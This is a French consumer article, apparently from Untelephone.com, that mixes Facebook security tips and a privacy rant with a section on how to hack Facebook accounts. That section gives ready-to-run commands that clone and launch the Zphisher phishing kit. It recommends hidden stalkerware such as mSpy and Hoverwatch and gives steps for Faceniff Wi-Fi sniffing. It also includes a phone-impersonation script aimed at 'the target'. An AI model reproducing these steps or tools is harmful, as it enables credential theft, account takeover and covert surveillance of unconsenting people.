Untelephone.com alerte les citoyens sur le dernier piratage de Facebook
Dernièrement, Facebook a été victime d’un piratage qui a permis d’accéder aux données et informations de plus de 50 millions de profils Facebook (source). Facebook a déconnecté plus de 90 millions d’utilisateurs, les obligeant à se reconnecter avec leurs identifiants pour éviter tout nouvel accès aux informations. L’enquête sur les pirates et sur ce qui a été accédé n’a rien donné.
En attendant d’en savoir plus sur le piratage et les informations consultées, Untelephone.com souhaite donner aux consommateurs des conseils sur la manière de se protéger contre l’usurpation d’identité ou d’autres préjudices liés à ce type de piratage :
- Ne donnez pas d’argent
- d’informations financières
- ni d’autres informations personnelles à une personne qui en fait la demande par l’intermédiaire de Facebook sans avoir vérifié son identité hors de Facebook.
- Déconnectez-vous de Facebook lorsque vous ne l’utilisez pas.
- Changez votre mot de passe et assurez-vous qu’il est solide. Continuez à changer votre mot de passe régulièrement.
- Activez les notifications de connexion dans les paramètres de votre profil afin d’être alerté chaque fois qu’une connexion est effectuée à partir d’un nouvel appareil.
- N’acceptez pas les demandes d’amis provenant de personnes que vous ne connaissez pas, et même si vous les connaissez, il peut s’agir d’un faux profil.
- Surveillez vos cartes de crédit, vos relevés bancaires et autres relevés financiers au fur et à mesure que vous les recevez afin de détecter toute dépense suspecte
- Surveillez votre dossier de crédit en consultant les principaux bureaux de crédit.
Si vous pensez avoir été victime d’une usurpation d’identité ou que vos informations personnelles ont été compromises
- Contactez la police
- Gelez ou fermer immédiatement tous les comptes concernés.
- Changez vos numéros d’identification et les mots de passe de vos comptes.
- Signalez l’incident
Liste des techniques utilisées par les hackers pour pirater un compte Facebook
1- L’hameçonnageUn hacker motivé peut créer un faux site Facebook et vous envoyer un faux Email se faisant passer pour le réseau social officiel. C’est la technique de l’hameçonnage : vous vous connectez à ce site en rentrant vos identifiants, et le hacker récupère du coup votre mot de passe. |
2- Les keyloggersUn logiciel malveillant peut s’installer dans votre ordinateur à la manière d’un virus qui enregistre tout ce que vous tapez au clavier : ce sont des keyloggers (description ici). Le jour où vous vous connectez à Facebook en rentrant votre identifiant et votre mot de passe, le keylogger les enregistre et les retransmet au hacker.
|
3- Un logiciel espionVotre smartphone tout entier peut se faire pirater à l’aide d’un logiciel espion pour smartphone, dont le plus réputé est Mspy. L’individu doit prendre le téléphone en main et y installer l’application invisible. Ce type d’application pour téléphone portable envoie au pirate :
D’autres logiciels espions existent : Le dernier nouveau-né des applications-espionnes s’appelle « PhonSee » et permet de lire à distance vos réseaux sociaux ainsi que vos messageries sans que vous le sachiez. |
4- Le détournement de cookiesVotre session Windows peut être détournée. Lorsqu’un utilisateur navigue sur son flux Facebook, des informations concernant son statut de connexion servent à indiquer qu’il est authentiquement connecté. A cette fin, des petits fichiers inoffensifs sont enregistrés sur votre disque dur : on les appelle des cookies. Cryptés, ils contiennent des données très sensibles. Le détournement de ces cookies peut aider à accéder au compte Facebook d’une victime. Il faut des connaissances en hacking pour accéder à ces fichiers et les utiliser pour déchiffrer le mot de passe Facebook de la victime (voir ici les logiciels utilisés). |
5- La méthode de la force bruteLa méthode de la force brute consiste à envoyer des requêtes aux serveurs Facebook à très grande vitesse. Au bout d’un certain temps, à force d’essais répétés, le mot de passe correct peut être trouvé. Cette méthode consomme beaucoup de ressources et n’est pas recommandée, les gros sites sachant dorénavant s’en protéger.
|
6- Le DNS SpoofingLe DNS Spoofing est l’une des méthodes les plus avancées pour pirater Facebook avec un taux de réussite élevé. Il s’agit d’accéder au PC ou à l’appareil mobile de la victime et de modifier les adresses DNS d’internet. De cette façon, toute information devant être envoyée aux serveurs de Facebook sera envoyée à un serveur pirate. Cette méthode de piratage est assez difficile à mettre en place, mais en cas de succès le taux de réussite du piratage de facebook est de 100%. |
7- Les Bots USBEnfin, comme indiqué dans cet article d’un Geek, les clés USB peuvent être utilisées pour lancer un programme à votre insu. Les « Bots USB » sont assez couramment utilisés dans le domaine du piratage de comptes facebook. Cette astuce ne marche plus sur Windows 10 & 7 parce que l’exécution automatique de Windows favorisait l’installation de virus et que Microsoft a purement et simplement retiré l’AutoRun de ces deux OS lors de la connexion d’un support USB à un PC. |
Ne vous faîtes pas pirater sur Facebook. Faîtes ces 6 choses dès maintenant.
Étant donné qu’il est un million de fois plus facile de prévenir un piratage de Facebook que d’y remédier après coup, prenez ces mesures simples dès maintenant pour éviter de souffrir à l’avenir.
1 – Activez l’authentification à deux facteurs
L’activation de l’authentification à deux facteurs signifie que vous devrez périodiquement saisir un code spécial en plus de votre mot de passe lorsque vous vous connecterez à partir d’un nouvel appareil. Même si un pirate informatique obtient votre identifiant et votre mot de passe, il ne peut pas accéder à votre compte sans code.
- Allez dans Paramètres et confidentialité → Paramètres → Sécurité et connexion → Authentification à deux facteurs
- cliquez sur « Modifier »
- entrez votre mot de passe
Trois options s’offrent à vous. Voici ce que fait chacune d’entre elles, dans l’ordre de leur degré de sécurité.
- Message texte (SMS) : Facebook envoie à votre téléphone un numéro que vous devez saisir sur le site web ou dans l’application Facebook lorsque vous vous connectez, après avoir entré votre mot de passe. Il s’agit de l’option la plus simple et d’une amélioration considérable par rapport à l’email de connexion et au mot de passe.
- Application d’authentification : Cette option fonctionne de la même manière que l’option texte, mais vous devez ouvrir une application tierce pour obtenir le code numérique au lieu d’un message. Nous vous recommandons de télécharger une application d’authentification gratuite et réputée, comme Authy de Twilio ou Google Authenticator (iOS, Android). L’utilisation d’une application au lieu d’un message texte vous protège contre un type de piratage grave mais peu courant appelé échange de carte SIM.
- Clé de sécurité : au lieu d’utiliser un message texte ou une application pour smartphone, cette option vous permet d’authentifier votre identité à l’aide d’une clé de sécurité physique. Il s’agit d’un petit dongle que vous portez toujours sur vous, comme celui fabriqué par Yubico, et qui doit être branché ou tapé sur l’appareil sur lequel vous essayez de vous connecter. Cela n’est pas nécessaire pour la grande majorité des utilisateurs occasionnels de Facebook.
2 – Assurez-vous que votre adresse électronique est à jour
Si Facebook ne dispose que d’une ancienne adresse électronique qui ne fonctionne pas, il sera pratiquement impossible de réinitialiser votre mot de passe en cas d’urgence.
Assurez-vous que le site dispose de votre adresse électronique actuelle et non d’un vieux compte Yahoo ou universitaire que vous ne consultez plus. Votre compte de messagerie doit également être doté d’un mot de passe fort et unique, et l’authentification à deux facteurs doit être activée.
Allez dans Paramètres et confidentialité → Paramètres → Général → Contact. Vérifiez l’adresse électronique indiquée et mettez-la à jour si nécessaire.
3 – Mettez à jour les mots de passe faibles et conservez les bons en lieu sûr
Même si l’authentification à deux facteurs est activée, il est indispensable d’avoir de bons mots de passe.
Assurez-vous que votre mot de passe Facebook est unique, c’est-à-dire que vous n’utilisez pas le même mot de passe pour d’autres services. Renforcez-le en respectant toutes les règles classiques en matière de mots de passe ou en créant un nouveau mot de passe à l’aide d’une application de gestion de mots de passe comme NordPass.
Enfin, assurez-vous que votre mot de passe actuel n’a pas fait l’objet d’une violation de données ou d’un piratage en le recherchant sur les mêmes applications de gestion de mots de passe ou sur le site Have I Been Pwned.
Les applications de gestion des mots de passe sont recommandées, mais si l’ajout d’une nouvelle application à votre vie vous semble trop compliqué, vous pouvez conserver un carnet de mots de passe écrit.
4 – Sachez si vous êtes victime d’une escroquerie
Tous les dispositifs de sécurité du monde ne peuvent pas vous empêcher de tomber dans les filets d’escrocs convaincants dans les courriels, les textos, Messenger ou au téléphone. Voici quelques règles empiriques pour éviter d’être manipulé et de devoir donner son mot de passe Facebook, son argent ou ses informations personnelles.
- Ne faites confiance à personne : Si vous recevez un message d’un ami, d’un membre de votre famille ou d’un inconnu officiel vous demandant de l’aide, des codes de sécurité, de l’argent ou des informations personnelles, ne répondez pas. Contactez-le d’une autre manière pour lui demander s’il s’agit d’un vrai message.
- Ne communiquez jamais votre mot de passe ou vos codes : Facebook ne vous enverra jamais de SMS, d’e-mail ou d’appel pour vous demander vos informations de connexion ou le code d’authentification à deux facteurs. Le seul endroit où vous les communiquerez sera le site web ou l’application Facebook.
- Méfiez-vous des liens : Si vous cliquez sur un lien et qu’il ouvre une page de connexion à Facebook, ne saisissez pas vos informations d’identification. Utilisez votre navigateur pour accéder à la page d’accueil de Facebook et connectez-vous à cet endroit.
- Répondez rapidement aux mises à jour de sécurité de Facebook : Si vous recevez un courriel de Facebook vous informant d’une activité suspecte sur votre compte, utilisez le bouton « Ce n’était pas moi » pour le signaler (assurez-vous d’abord qu’il s’agit bien d’un courriel de Facebook). Ensuite, connectez-vous à votre compte dans une nouvelle fenêtre de navigateur en tapant Facebook.com et changez votre mot de passe.
- Si vous paniquez, faites une pause : Les criminels recherchent les réactions émotionnelles et prospèrent lorsque leurs victimes se sentent vulnérables. Si quelqu’un vous tend la main en vous disant « envoyez-nous ces informations rapidement ou votre compte sera perdu à jamais » , restez sur vos gardes. Contactez séparément le service d’assistance de Facebook et demandez-lui s’il y a vraiment un problème.
5 – Prévoyez un plan de secours
Les conséquences ne se limitent pas à des désagréments ou à de l’argent. Un compte Facebook piraté peut également signifier la perte de liens avec des membres de la famille ou des amis, ou la perte de contrôle de la seule présence en ligne d’une petite entreprise.
- Sauvegardez dès maintenant l’intégralité de votre compte Facebook, afin de disposer d’une copie de sauvegarde de tous vos contacts, messages et autres informations.
- Allez dans Paramètres et confidentialité → Paramètres → Vos informations Facebook → Télécharger vos informations.
- Sélectionnez Afficher et remplissez le formulaire pour obtenir un fichier contenant l’ensemble de votre historique Facebook.
Si vous l’avez utilisé pour stocker des photos au fil des ans, vous pouvez transférer ces albums directement vers d’autres services afin d’en avoir des copies. Allez dans Paramètres et confidentialité → Paramètres → Vos informations Facebook → Transférer une copie de vos informations. Sélectionnez Afficher et choisissez le service que vous souhaitez utiliser.
Les étapes utilisées par les hackers pour pirater Facebook
1- Pirater Facebook avec Zphisher
⇒ Installation de Zphisher sur Linux
apt update
apt install git php openssh curl -y
git clone https://github.com/htr-tech/zphisher
cd zphisher
chmod +x zphisher.sh
bash zphisher.sh
⇒ Ou utiliser une seule commande
apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh
⇒ Caractéristiques de Zphisher
- [+] Donne les dernières pages de connexion Facebook
- [+] Permet aussi de suivre Instagram
⇒ Page de téléchargement de Zphisher
2- Pirater l’identifiant et le mot de passe du compte Facebook avec un Keylogger
Les keyloggers enregistrent les frappes qu’une cible presse sur son clavier. Ils sont souvent utilisés pour recueillir les mots de passe.
Les keyloggers pour Windows et Mac OS
Ces outils d’enregistrement de frappe fonctionnent secrètement sur un ordinateur et recueille les données des utilisateurs.
Ils enregistrent les frappes au clavier et vous permettent de visualiser l’appareil à distance, quel que soit l’endroit où vous vous trouvez.
Vous devez avoir un accès physique aux machines pour installer cette application.
Les enregistreurs de frappe pour téléphones portables
➢ mSpy
Site officiel
MSpy est l’outil de surveillance et de suivi mobile le plus utilisé de nos jours. Il regorge de fonctionnalités utiles qui incitent les utilisateurs à choisir mSpy plutôt que ses concurrents.
Ses fonctionnalités les plus utilisées sont les suivantes :
- Surveillance invisible des applications de messagerie (Facebook Messenger / WhatsApp / SMS / Viber / Instagram et autres)
- Suivi de la localisation du téléphone
- Suivi des conversations téléphoniques (sortantes et entrantes)
- Enregistrement des frappes au clavier
- Prise en charge pour les appareils Android et iOS
➢ Hoverwatch
Site officiel
Hoverwatch vous permet de surveiller à distance n’importe quel appareil Android (il ne marche pas sur iPhone). Ce logiciel primé vous permet de garder un œil sur votre cible, à condition que vous ayez obtenu son accord.
Il sait cacher son icône et est un des seuls keyloggers à pouvoir enregistrer en plus les appels et les conversations du téléphone.
3 – Pirater un compte Facebook par Wi-Fi
Pour pirater un compte Facebook par Wi-Fi, vous devez télécharger Faceniff, une application Android qui vous donnera accès à toutes les informations de l’appareil cible, y compris le nom d’utilisateur et le mot de passe des comptes de réseaux sociaux de la cible.
Vous devez également vous assurer que la cible se trouve sur le même réseau Wi-Fi que vous.
- Connectez-vous à internet
- Lancez l’application Faceniff une fois le téléchargement terminé
- Appuyez ensuite sur la touche Entrée après avoir cliqué sur le bouton rouge, qui deviendra rouge après l’activation du renifleur
- Une liste de comptes liés au réseau Wi-Fi s’affiche, dans laquelle vous pouvez sélectionner le compte que vous souhaitez pirater
➢ Alternative à Faceniff pour pirater Facebook : le logiciel AndroRAT dont nous parlions dans cet article
4 – La méthode de l’hameçonnage
Le phishing est un moyen courant utilisé pour pirater un compte Facebook. En effet, il est très facile de tromper l’utilisateur en lui demandant de donner aveuglément ses identifiants Facebook sans qu’il le sache.
L’hameçonnage est responsable de 80 % des piratages de comptes et cette statistique ne risque pas de changer de sitôt, grâce à son taux de réussite pour pirater un mot de passe.
Concrètement, le pirate crée une fausse page de connexion à Facebook qui ressemble à la vraie
- Le pirate envoie ensuite à la cible un courriel ou un SMS en se faisant passer pour le personnel d’administration de Facebook.
- La communication indique que l’utilisateur doit se connecter à son compte Facebook pour des raisons de sécurité ou pour vérifier le texte d’un ami.
- Le message contient un lien vers la page de phishing.
- Lorsque l’utilisateur clique sur le lien, il se retrouve sur la page du pirate au lieu de la page de connexion Facebook légitime.
- La victime saisit alors son nom d’utilisateur et son mot de passe.
- Dans de nombreux cas, le pirate informatique redirige ensuite la fausse page de phishing vers le site Facebook officiel, ce qui permet à la victime de visiter sa vraie page après s’être connectée.
3 manières dont l’ingénierie sociale s’y prend pour pirater un compte Facebook
L’ingénierie sociale est une façon intelligente d’ « arnaquer » les gens pour qu’ils vous donnent accès à leurs données de connexion sur Facebook.
Il existe plusieurs méthodes créatives pour cette approche, les suivantes étant les plus populaires :
1/ Se faire passer pour un technicien
- Appelez la cible
- Faîtes-vous passer pour un technicien Facebook
- Demandez-lui de vous fournir ses données de connexion pour que vous puissiez vérifier son compte
- Vous serez surpris de voir combien de personnes sont prêtes à donner leurs secrets si elles pensent qu’une figure autoritaire est au téléphone avec elles
2/ Emprunter le téléphone
- Demander à emprunter le téléphone de la cible
- Obtenir les informations de connexion en quelques secondes grâce à cette stratégie (il vous les donne volontairement)
3/ L’échange de SIM
L’attaque par échange de carte SIM est à mon avis la méthode gratuite la plus sournoise et la plus malveillante pour pirater le mot de passe d’un compte Facebook, ou tout autre mot de passe de compte en ligne.
L’échange de cartes SIM est une forme d’usurpation d’identité dans laquelle l’agresseur trompe un opérateur de téléphonie mobile et le convainc de changer le numéro de téléphone de sa victime pour un nouveau numéro de téléphone que l’agresseur possède.
L’attaquant fait cela pour détourner les messages SMS contenant des mots de passe à usage unique (OTP). Ils sont envoyés au numéro de téléphone lors d’opérations telles que :
- la réinitialisation du mot de passe d’un compte
- l’exécution d’une transaction bancaire, etc.
Une fois les SMS interceptés, le pirate peut faire un reset du mot de passe Facebook et prendre possession du compte.
Comment reconnaître un compte Facebook piraté ?
Voici 5 signes généraux qui indiquent que votre compte Facebook a été piraté.
- Vous ne pouvez plus accéder à votre compte. Le pirate a peut-être changé le mot de passe et vous a déconnecté.
- Quelqu’un publie des articles ou des messages à votre insu. Il peut s’agir de promotions, d’offres de spam, etc. Vous pouvez également remarquer des publications dans votre groupe Facebook.
- Quelqu’un envoie du spam à vos amis et contacts.
- Vos photos deviennent virales, ou quelqu’un les a publiées sur internet ou dans un groupe Facebook.
- Des pirates informatiques malveillants peuvent envoyer des liens de phishing à vos amis dans le but de pirater d’autres comptes.
Facebook n’est pas un site de réseau social, c’est un moteur de publicité qui offre un contenu interactif que les gens trouvent suffisamment attrayant pour y participer en grand nombre.
Sur internet, Facebook suit les sites que vous visitez et leur durée, les pages que vous lisez, ce que vous « aimez » sur tous les sites qui utilisent le bouton « Like » de Facebook ou un pixel de suivi invisible (ce qui représente un nombre considérable de sites).
Il le fait que vous soyez connecté ou non à Facebook. Il localise votre adresse IP et détermine à qui vous pourriez être associé ou lié en regardant également qui d’autre utilise cette même adresse IP et ce qui les intéresse.
L’ère numérique a apporté à la société des changements si fondamentaux que nous ne les avons pas encore saisis.
Par exemple, les assistants numériques intelligents s’immiscent dans votre vie privée de manière stupéfiante, tout en étant très pratiques (ou pas ?).
Facebook est criticable mais tant qu’il y aura des tonnes d’usagers sur cette plate-forme, elle restera sous le feu des projecteurs…
C’est comme pour Google : Les webmestres restent dépendants de ses résultats car les gens n’arrivent pas à changer de moteur de recherche…
Facebook a été une force négative pour la démocratie, car il brise la barrière entre le réel et la rumeur. Et maintenant que la pénétration des réseaux sociaux bat son plein, Facebook exerce sur nous tous un contrôle bien trop important pour que nous puissions l’imaginer.
Il est illégal d’intercepter et d’ouvrir le courrier physique de première classe des gens, alors pourquoi n’avons-nous pas les mêmes lois pour protéger leur email ?
Facebook sait qui sont vos amis personnels et vos associés professionnels, et peut établir des cartes thermiques de la majorité de vos relations avec des personnes et des entreprises.
Il utilise des techniques d’IA pour lire et classer automatiquement vos publications et chaque mot que vous tapez dans Facebook Messenger.
En fait, jusque dans les années 1990, TOUTES les formes de communications personnelles étaient protégées par des lois strictes.
La donne a changé. Tout cela est désormais de l’histoire ancienne. Avec l’avènement d’Internet, nos législateurs sont restés pratiquement muets sur la question de la protection de la vie privée numérique.
Je veu pirate un compte
J’espère que cet article aura répondu à vos questions.
Oui
Facebook localise à la fois votre vie numérique et certains aspects de votre vie physique afin de déterminer vos centres d’intérêt et de vous catégoriser pour les annonceurs. Il existe des centaines de catégories, allant de votre sexualité au type de déodorant que vous préférez, de vos associations religieuses et politiques à vos goûts musicaux et médiatiques. Alors pourquoi seul ce réseau social pourrait espionner le contenu ?
Puisque c’est un petit nombre (les gens au pouvoir) qui manipule le grand nombre (le reste du monde), la seule façon de réaliser une manipulation à une si grande échelle est de contrôler la perception du grand nombre et de diviser pour mieux régner.
Et pour contrôler la perception, il faut contrôler l’information.
Le flux de Facebook peut être facilement manipulé et montrer le contenu qu’il veut que vous voyiez.
Si vous utilisez l’application Facebook sur un appareil mobile, elle signale votre position GPS minute par minute à Facebook 24 heures sur 24, 7 jours sur 7, avec une résolution suffisamment détaillée pour savoir dans quels magasins vous vous trouvez, où vous dînez, quels itinéraires vous empruntez, où vous travaillez et à côté de quels téléphones votre téléphone dort, avec tout ce que cela implique sur vous et cette autre personne dans le monde physique.